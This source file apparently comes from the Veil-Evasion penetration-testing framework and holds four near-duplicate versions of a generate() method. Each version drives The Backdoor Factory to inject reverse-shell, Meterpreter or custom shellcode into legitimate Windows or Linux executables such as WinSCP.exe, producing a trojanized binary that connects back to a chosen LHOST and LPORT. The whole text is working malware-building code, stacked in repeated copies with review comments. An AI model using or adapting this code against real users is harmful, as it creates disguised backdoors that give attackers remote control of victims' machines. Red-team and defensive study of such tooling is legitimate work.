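def generate(self):
    """Patch the selected payload into ``orig_exe`` with The Backdoor Factory.

    Reads ``orig_exe``, ``payload``, ``LHOST`` and ``LPORT`` from
    ``self.required_options`` and dispatches on ``self.type`` ('PE' or
    'ELF'; presumably set by ``basicDiscovery()`` -- confirm). Sets
    ``self.extension`` as a side effect.

    Returns:
        The bytes read from ``backdoored/payload.exe`` under the
        Veil-Evasion root, or ``""`` when the payload choice, the file
        type, the BDF run or the read of the output fails.
    """
    # Because BDF is called via its classes, the default binary name is
    # rewritten to its path under the Veil-Evasion root.
    if self.required_options["orig_exe"][0] == "WinSCP.exe":
        self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

    # Make sure the bin is supported
    self.basicDiscovery()

    if self.required_options["payload"][0] == "custom":
        Shellcode = self.shellcode.generate()
        raw = Shellcode.decode("string_escape")

        # NOTE(review): fixed file name in the temp directory; this method
        # does not remove the file afterwards.
        shellcode_path = settings.TEMP_DIR + "shellcode.raw"
        with open(shellcode_path, 'wb') as f:
            f.write(raw)

        print "shellcode", shellcode_path

        # invoke the class for the associated binary
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""
    else:
        # Translate the menu's payload name into the shell name handed to
        # BDF; "meter_https" is only accepted for PE files.
        payload = self.required_options["payload"][0]
        if payload == "meter_tcp":
            shellcodeChoice = "reverse_tcp_stager"
        elif payload == "meter_https" and self.type == "PE":
            shellcodeChoice = "meterpreter_reverse_https"
        elif payload == "rev_shell":
            shellcodeChoice = "reverse_shell_tcp"
        else:
            print helpers.color("\n [!] Please enter a valid payload choice.", warning=True)
            raw_input("\n [>] Press any key to return to the main menu:")
            return ""

        # invoke the class for the associated binary
        # NOTE(review): int() raises ValueError on a non-numeric LPORT; that
        # is not handled here.
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""

    print helpers.color("\n[*] Running The Backdoor Factory...")

    try:
        # PATCH STUFF
        try:
            targetFile.run_this()
        except SystemExit:
            # BDF calls sys.exit() on errors; catch it so Veil keeps running
            print "\nBackdoorFactory Error, check options and binary\n"
            return ""

        # Fixed pause before the output is read.
        # NOTE(review): no completion signal is checked, only elapsed time.
        time.sleep(4)

        # Read the patched file from backdoored/ under the Veil-Evasion
        # root; the context manager closes the handle even if read() fails.
        with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f:
            PayloadCode = f.read()

    except IOError:
        print "\nError during The Backdoor Factory execution\n"
        raw_input("\n[>] Press any key to return to the main menu:")
        return ""

    try:
        # remove backdoored/ in VEIL root
        shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
    except Exception:
        # best-effort cleanup: a failure here is deliberately ignored
        pass

    return PayloadCode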
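def generate(self):
    """Patch the selected payload into ``orig_exe`` with The Backdoor Factory.

    Reads ``orig_exe``, ``payload``, ``LHOST``, ``LPORT`` and
    ``PATCH_METHOD`` from ``self.required_options`` and dispatches on
    ``self.type`` ('PE' or 'ELF'; presumably set by ``basicDiscovery()``
    -- confirm). ``PATCH_METHOD`` is only passed for PE files. Sets
    ``self.extension`` as a side effect.

    Returns:
        The bytes read from ``backdoored/payload.exe`` under the
        Veil-Evasion root, or ``""`` when the file type, the BDF run or
        the read of the output fails.
    """
    # Because BDF is called via its classes, the default binary name is
    # rewritten to its path under the Veil-Evasion root.
    if self.required_options["orig_exe"][0] == "WinSCP.exe":
        self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

    # Make sure the bin is supported
    self.basicDiscovery()

    if self.required_options["payload"][0] == "custom":
        Shellcode = self.shellcode.generate()
        raw = Shellcode.decode("string_escape")

        # NOTE(review): fixed file name in the temp directory; this method
        # does not remove the file afterwards.
        shellcode_path = settings.TEMP_DIR + "shellcode.raw"
        with open(shellcode_path, 'wb') as f:
            f.write(raw)

        print "shellcode", shellcode_path

        # invoke the class for the associated binary
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path,
                PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""
    else:
        # The payload option is handed to BDF as the shell name unchanged;
        # this method does not check it against a list of known names.
        shellcodeChoice = self.required_options['payload'][0]

        # invoke the class for the associated binary
        # NOTE(review): int() raises ValueError on a non-numeric LPORT; that
        # is not handled here.
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]),
                PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""

    print helpers.color("\n[*] Running The Backdoor Factory...")

    # PATCH STUFF
    try:
        targetFile.run_this()
    except (Exception, SystemExit):
        # BDF calls sys.exit() on errors; catch that and ordinary errors so
        # Veil keeps running. KeyboardInterrupt is no longer swallowed and
        # misreported as a BDF failure.
        print "\nBackdoorFactory Error, check options and binary\n"
        raw_input("\n[>] Press any key to return to the main menu:")
        return ""

    # Fixed pause before the output is read.
    # NOTE(review): no completion signal is checked, only elapsed time.
    time.sleep(3)

    try:
        # Read the patched file from backdoored/ under the Veil-Evasion root
        with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f:
            PayloadCode = f.read()
    except IOError:
        print "\nError during The Backdoor Factory execution\n"
        raw_input("\n[>] Press any key to return to the main menu:")
        return ""

    try:
        # remove backdoored/ in VEIL root
        shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
    except Exception:
        # best-effort cleanup: a failure here is deliberately ignored
        pass

    return PayloadCode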
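def generate(self):
    """Patch the selected payload into ``ORIGINAL_EXE`` with The Backdoor Factory.

    Reads ``ORIGINAL_EXE``, ``PAYLOAD``, ``LHOST``, ``LPORT`` and
    ``PATCH_METHOD`` from ``self.required_options`` and dispatches on
    ``self.type`` ('PE' or 'ELF'; presumably set by ``basicDiscovery()``
    -- confirm). ``PATCH_METHOD`` is only passed for PE files. Sets
    ``self.extension`` as a side effect.

    Returns:
        The bytes read from ``backdoored/payload.exe`` under the
        Veil-Evasion root, or ``""`` when the file type, the BDF run or
        the read of the output fails.
    """
    # Because BDF is called via its classes, the default binary name is
    # rewritten to its path under the Veil-Evasion root.
    if self.required_options["ORIGINAL_EXE"][0] == "WinSCP.exe":
        self.required_options["ORIGINAL_EXE"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

    # Make sure the bin is supported
    self.basicDiscovery()

    shellcodeChoice = self.required_options['PAYLOAD'][0]

    # Shell names noted by the original author:
    #cave_miner_inline
    #iat_reverse_tcp_inline
    #iat_reverse_tcp_inline_threaded
    #iat_reverse_tcp_stager_threaded
    #iat_user_supplied_shellcode_threaded
    #meterpreter_reverse_https_threaded
    #reverse_shell_tcp_inline
    #reverse_tcp_stager_threaded
    #user_supplied_shellcode_threaded

    # NOTE(review): the disabled check below joins its comparisons with
    # `and`, so as written it would reject every value. With it commented
    # out, this method passes the payload name on without validating it.
    #if self.type == 'PE':
    #    if not (shellcodeChoice == 'meterpreter_https' and shellcodeChoice == 'meter_https'
    #            and shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp'
    #            and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell'
    #            and shellcodeChoice == 'custom'):
    #        print helpers.color("\n [*] Invalid payload: %s..." % shellcodeChoice, warning=True)
    #        return ""
    #elif self.type == 'ELF':
    #    if not (shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp'
    #            and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell'
    #            and shellcodeChoice == 'custom'):
    #        print helpers.color("\n[*] Invalid payload: %s..." % shellcodeChoice, warning=True)
    #        return ""
    #else:
    #    print helpers.color("\n[*] Invalid type: %s..." % self.type, warning=True)
    #    return ""

    if shellcodeChoice == "custom":
        Shellcode = self.shellcode.generate(self.required_options)
        raw = Shellcode.decode("string_escape")

        # NOTE(review): fixed file name in the temp directory; this method
        # does not remove the file afterwards.
        shellcode_path = settings.TEMP_DIR + "shellcode.raw"
        with open(shellcode_path, 'wb') as f:
            f.write(raw)

        print "shellcode", shellcode_path

        # invoke the class for the associated binary
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["ORIGINAL_EXE"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path,
                PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["ORIGINAL_EXE"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""
    else:
        # invoke the class for the associated binary
        # NOTE(review): int() raises ValueError on a non-numeric LPORT; that
        # is not handled here.
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["ORIGINAL_EXE"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]),
                PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["ORIGINAL_EXE"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""

    print helpers.color("\n[*] Running The Backdoor Factory...")

    # PATCH STUFF
    try:
        targetFile.run_this()
    except (Exception, SystemExit):
        # BDF calls sys.exit() on errors; catch that and ordinary errors so
        # Veil keeps running. KeyboardInterrupt is no longer swallowed and
        # misreported as a BDF failure.
        print "\nBackdoorFactory Error, check options and binary\n"
        raw_input("\n[>] Press any key to return to the main menu.")
        return ""

    # Fixed pause before the output is read.
    # NOTE(review): no completion signal is checked, only elapsed time.
    time.sleep(3)

    try:
        # Read the patched file from backdoored/ under the Veil-Evasion root
        with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f:
            PayloadCode = f.read()
    except IOError:
        print "\nError during The Backdoor Factory execution\n"
        raw_input("\n[>] Press any key to return to the main menu.")
        return ""

    try:
        # remove backdoored/ in VEIL root
        shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')
    except Exception:
        # best-effort cleanup: a failure here is deliberately ignored
        pass

    return PayloadCode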
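def generate(self):
    """Patch the selected payload into ``orig_exe`` with The Backdoor Factory.

    Reads ``orig_exe``, ``payload``, ``LHOST`` and ``LPORT`` from
    ``self.required_options`` and dispatches on ``self.type`` ('PE' or
    'ELF'; presumably set by ``basicDiscovery()`` -- confirm). Sets
    ``self.extension`` as a side effect.

    Returns:
        The bytes read from ``backdoored/payload.exe`` under the
        Veil-Evasion root, or ``""`` when the payload choice, the file
        type, the BDF run or the read of the output fails.
    """
    # Because BDF is called via its classes, the default binary name is
    # rewritten to its path under the Veil-Evasion root.
    if self.required_options["orig_exe"][0] == "psinfo.exe":
        self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/psinfo.exe"

    # Make sure the bin is supported
    self.basicDiscovery()

    if self.required_options["payload"][0] == "custom":
        Shellcode = self.shellcode.generate()
        raw = Shellcode.decode("string_escape")

        # NOTE(review): fixed file name in the temp directory; this method
        # does not remove the file afterwards.
        shellcode_path = settings.TEMP_DIR + "shellcode.raw"
        with open(shellcode_path, 'wb') as f:
            f.write(raw)

        print "shellcode", shellcode_path

        # invoke the class for the associated binary
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL='user_supplied_shellcode',
                SUPPLIED_SHELLCODE=shellcode_path)
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""
    else:
        # Translate the menu's payload name into the shell name handed to
        # BDF; "meter_https" is only accepted for PE files.
        payload = self.required_options["payload"][0]
        if payload == "meter_tcp":
            shellcodeChoice = "reverse_tcp_stager"
        elif payload == "meter_https" and self.type == "PE":
            shellcodeChoice = "meterpreter_reverse_https"
        elif payload == "rev_shell":
            shellcodeChoice = "reverse_shell_tcp"
        else:
            print helpers.color("\n [!] Please enter a valid payload choice.", warning=True)
            raw_input("\n [>] Press any key to return to the main menu:")
            return ""

        # invoke the class for the associated binary
        # NOTE(review): int() raises ValueError on a non-numeric LPORT; that
        # is not handled here.
        if self.type == 'PE':
            targetFile = pebin.pebin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = "exe"
        elif self.type == 'ELF':
            targetFile = elfbin.elfbin(
                FILE=self.required_options["orig_exe"][0],
                OUTPUT='payload.exe',
                SHELL=shellcodeChoice,
                HOST=self.required_options["LHOST"][0],
                PORT=int(self.required_options["LPORT"][0]))
            self.extension = ""
        else:
            print "\nInvalid File or File Type Submitted, try again.\n"
            return ""

    print helpers.color("\n[*] Running The Backdoor Factory...")

    try:
        # PATCH STUFF
        try:
            targetFile.run_this()
        except SystemExit:
            # BDF calls sys.exit() on errors; catch it so Veil keeps running
            print "\nBackdoorFactory Error, check options and binary\n"
            return ""

        # Fixed pause before the output is read.
        # NOTE(review): no completion signal is checked, only elapsed time.
        time.sleep(4)

        # Read the patched file from backdoored/ under the Veil-Evasion
        # root; the context manager closes the handle even if read() fails.
        with open(settings.VEIL_EVASION_PATH+"backdoored/payload.exe", 'rb') as f:
            PayloadCode = f.read()

    except IOError:
        print "\nError during The Backdoor Factory execution\n"
        raw_input("\n[>] Press any key to return to the main menu:")
        return ""

    try:
        # remove backdoored/ in VEIL root
        shutil.rmtree(settings.VEIL_EVASION_PATH+'backdoored')
    except Exception:
        # best-effort cleanup: a failure here is deliberately ignored
        pass

    return PayloadCode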